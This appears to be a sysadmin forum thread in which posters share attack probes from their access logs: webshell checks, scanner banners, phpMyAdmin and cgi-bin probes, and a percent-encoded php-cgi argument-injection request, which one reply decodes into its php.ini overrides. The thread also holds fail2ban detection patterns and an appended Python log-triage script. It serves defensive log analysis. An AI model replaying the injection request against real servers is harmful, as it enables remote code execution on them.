Exploit permissions?
Posted 10-27-2015 at 06:48 PM by Habitual
Found this today in my access.log.
I have to admit, it's a humorous touch.
What's next?
Feel free to show some of the ones you all have, or am I the only one who stares at logs all day?
Code:
GET //skin/install/default/install.php?q=echo(\"CAN_I_UPLOAD_SHELL_HERE\")
What's next?
Code:
GET //skin/install/default/install.php?q=echo(\"THE_MATRIX_HAS_YOU\?)"
Comments
You're not the only one.
These are just a few entries from the web server running in my basement, not any kind of production server or anything with something desirable on it.
Code:
61.19.246.190 - - [19/Aug/2014:11:22:41 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 487 "-" "ZmEu"
122.226.223.69 - - [17/Aug/2014:12:29:53 -0400] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 404 530 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
209.67.233.66 - - [30/Aug/2014:20:46:28 -0400] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 506 "-" "-"
115.29.10.210 - - [06/Sep/2014:07:56:46 -0400] "GET http://hotel.qunar.com/render/hoteldiv.jsp?&__jscallback=XQScript_4 HTTP/1.1" 404 452 "http://hotel.qunar.com/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36"
Code:
$ grep -i "GET /PhpMyAdmin" all_access.log | wc -l
1191
$ grep -i "GET /pma" all_access.log | wc -l
561
Code:
$ grep -i "cgi-bin" all_access.log | wc -l
3085
Code:
221.194.47.232 - - [17/Aug/2014:13:09:13 -0400] "POST /cgi-bin/php4?2D64+61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
Posted 11-15-2015 at 02:58 PM by maples
Updated 11-15-2015 at 03:03 PM by maples (Adding more)
Quote:
You're not the only one.
These are just a few entries from the web server running in my basement, not any kind of production server or anything with something desirable on it.
Quote:
And does anyone have any idea what's going on with this? Google doesn't seem to like it.
Code:
221.194.47.232 - - [17/Aug/2014:13:09:13 -0400] "POST /cgi-bin/php4?2D64+61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
Code:
allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
Good Stuff.
Thanks!
Posted 05-04-2016 at 11:41 AM by Habitual
Code:
118.193.27.2 - - [16/May/2016:12:09:58 -0700] "\x16\x03\x01\x01"\x01" 200 8329 "-" "-"
118.193.27.2 - - [16/May/2016:12:10:07 -0700] "USER test +iw test :Test Wuz Here" 400 0 "-" "-"
Code:
failregex = ^<HOST> .* ".*?\\x16\\x03\\x01\\x01\\.*?"
            ^<HOST> .* ".*?test.*?"
Posted 05-16-2016 at 02:37 PM by Habitual
Updated 05-16-2016 at 02:39 PM by Habitual
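As an added example (not code from this thread or from any of its posters), here is a small Python triage script that parses combined-format access log lines like the ones above, percent-decodes the query so the php-cgi `-d` directives become readable, and buckets each hit into the kinds of noise seen in this thread; it also shows why the broad `.*?test.*?` failregex above needs tightening. The sample lines are constructed (RFC 5737 test addresses), modelled on the entries posted here.

```python
import re
from urllib.parse import unquote_plus

# Apache combined format; quoted fields may hold \" escapes (non-quote or backslash-escaped chars).
FIELD = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + FIELD +
                    r')" (?P<status>\d{3}) \S+ "' + FIELD + r'" "' + FIELD + r'"$')
METHODS = ('GET ', 'POST ', 'HEAD ', 'OPTIONS ', 'PUT ')
PHP_INI_OVERRIDES = ('allow_url_include', 'auto_prepend_file', 'safe_mode', 'disable_functions')

def classify(req):
    """Map one raw request field to a coarse noise category (detection only)."""
    if not req.startswith(METHODS):
        return 'non-http'             # e.g. a TLS ClientHello (\x16\x03\x01...) on a plain HTTP port
    target = req.split(' ', 2)[1]
    path, _, query = target.partition('?')
    query = unquote_plus(query)       # percent-decode so the php-cgi -d directives become readable
    if target.startswith(('http://', 'https://')):
        return 'open-proxy-probe'     # absolute URL: testing whether the server relays requests
    if 'w00tw00t' in path:
        return 'scanner-signature'    # ZmEu / DFind style banner
    if re.search(r'/(phpmyadmin|pma)\b', path, re.IGNORECASE):
        return 'phpmyadmin-probe'
    if path.startswith('/cgi-bin/php') and any(k in query for k in PHP_INI_OVERRIDES):
        return 'php-cgi-argument-injection'   # php.ini overrides passed as php-cgi arguments
    if path.endswith('install.php') and 'echo(' in query:
        return 'webshell-probe'
    return 'other'

def triage(log_text):
    """Return (host, status, category) for each parseable line; garbage lines are skipped."""
    rows = []
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if m:
            rows.append((m['host'], int(m['status']), classify(m['req'])))
    return rows

# The broad ".*?test.*?" failregex from the comment above (<HOST> written as \S+) also fires on ordinary pages.
LOOSE_TEST_RE = re.compile(r'^\S+ .* ".*?test.*?"')
# Constructed sample lines modelled on the entries in this thread (RFC 5737 addresses).
SAMPLE_LOG = r'''
203.0.113.10 - - [19/Aug/2014:11:22:41 -0400] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 487 "-" "ZmEu"
203.0.113.11 - - [17/Aug/2014:12:29:53 -0400] "GET http://www.example.com//hello.html HTTP/1.1" 404 530 "-" "Mozilla/4.0"
203.0.113.12 - - [17/Aug/2014:13:09:13 -0400] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0"
203.0.113.13 - - [16/May/2016:12:09:58 -0700] "\x16\x03\x01\x01\"\x01" 200 8329 "-" "-"
203.0.113.14 - - [27/Oct/2015:18:48:00 -0400] "GET //skin/install/default/install.php?q=echo(\"CAN_I_UPLOAD_SHELL_HERE\") HTTP/1.1" 404 210 "-" "-"
203.0.113.15 - - [16/May/2016:12:11:00 -0700] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 300 "-" "-"
203.0.113.16 - - [16/May/2016:12:12:00 -0700] "GET /testimonials.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
'''
```

The last sample line is a legitimate page, yet `LOOSE_TEST_RE` matches it while `classify` files it under `other`; anchoring a fail2ban pattern on the request's start (or on the `USER ... :` IRC-style shape) rather than a bare substring avoids banning real visitors.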